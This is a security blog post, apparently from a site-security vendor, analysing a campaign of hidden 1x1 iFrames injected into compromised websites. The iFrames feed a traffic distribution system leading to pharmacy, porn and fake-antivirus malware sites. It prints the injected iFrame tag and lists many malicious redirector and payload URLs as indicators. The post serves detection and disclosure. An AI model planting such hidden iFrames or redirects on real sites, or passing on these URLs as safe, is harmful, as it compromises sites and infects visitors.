We were working on a compromised site today that had some hidden iFrames on it. The iFrames were redirecting visitors to what seemed like random domains. This is the iFrame we were seeing:
<iFrame src="httx://directs016. ru/in.cgi?wal" width=1 height=1 ..
Nothing new, but we decided to check how popular it was, and we were able to detect a few other sites with it. After a while the iFrame being injected changed and as we continued to track it, we noticed that it was changing every few hours. Here are some of the domains used up in the last few days:
http://directs005.ru/in.cgi?wal (18.104.22.168) http://directs012.ru/in.cgi?wal (22.214.171.124) http://directs013.ru/in.cgi?wal (126.96.36.199) http://directs014.ru/in.cgi?wal (188.8.131.52) http://directs015.ru/in.cgi?wal (184.108.40.206) http://directs016.ru/in.cgi?wal (220.127.116.11) http://directs027.eu/in.cgi?wal (18.104.22.168) http://directs026.eu/in.cgi?wal (22.214.171.124) http://directs025.eu/in.cgi?wal (126.96.36.199)
.. many more …
Once this initial iFrame it loaded, it is used as a redirector to secondary domains:
http://promoution013.eu/flow1.php http://promoution014.eu/flow1.php http://promoution015.eu/flow1.php http://promoution016.eu/flow1.php http://directs015.eu/flow08.php http://directs015.eu/flow1.php http://directs019.eu/flow08.php http://promoution014.eu/flow08.php http://directs014.eu/flow08.php
.. and many more variations – also changing every few hours ..
Once the secondary domains are loaded, it redirects the browser back to the directs00x.ru domain to distribute the traffic (SutraTDS/Traffic Distributions System):
This Traffic Distribution System (TDS) redirects the user randomly to affiliate sites (pharmacy / Pornography) or malware domains pushing off a Fake AV (antivirus) :
http://freehdpornvideos.info http://melroseurbanfemale.org http://eso3efkm34.shiparrestinistanbul.org/PDn9xzNUROvSNPse http://globaltravelexpress.com/26422274.html http://qiofnvpwo.gr8domain.biz/vd/5;5cd75596797b104d92dc9441749ba4d9 http://azdtsc.toythieves.com/uda377234/78576ecbcn.htm http://cartoonxpics.net
Traffic Distribution Systems / TDS
Using a TDS is a very simple way for the bad guys to make money. They compromise a site and redirect users of that hacked site to a TDS, where they receive an affiliate commission for the traffic sent.
Other bad guys can buy “spots” on those TDS’s and redirect users to their Pharma pages or exploit kit pages.
Code generation – Sorryforthiscode
In the beginning of the post, we mentioned that the iFrames change automatically on the compromised sites. It happens because instead of inserting the iFrame directly on the pages, they inject a PHP code to call sorryforthiscode.org and get the iFrame to display:
Yes, sorry for this code… sorryforthiscode.org was registered on Sep 20,2012 by email@example.com.
Domain Name:SORRYFORTHISCODE.ORG Created On:20-Sep-2012 23:06:27 UTC Last Updated On:20-Sep-2012 23:06:27 UTC Expiration Date:20-Sep-2013 23:06:27 UTC Registrant Email:firstname.lastname@example.org
The domain is host on a shared server with more domains.
We will post more details as we continue to monitor this campaign. Note that our SiteCheck scanner will detect this type of compromise.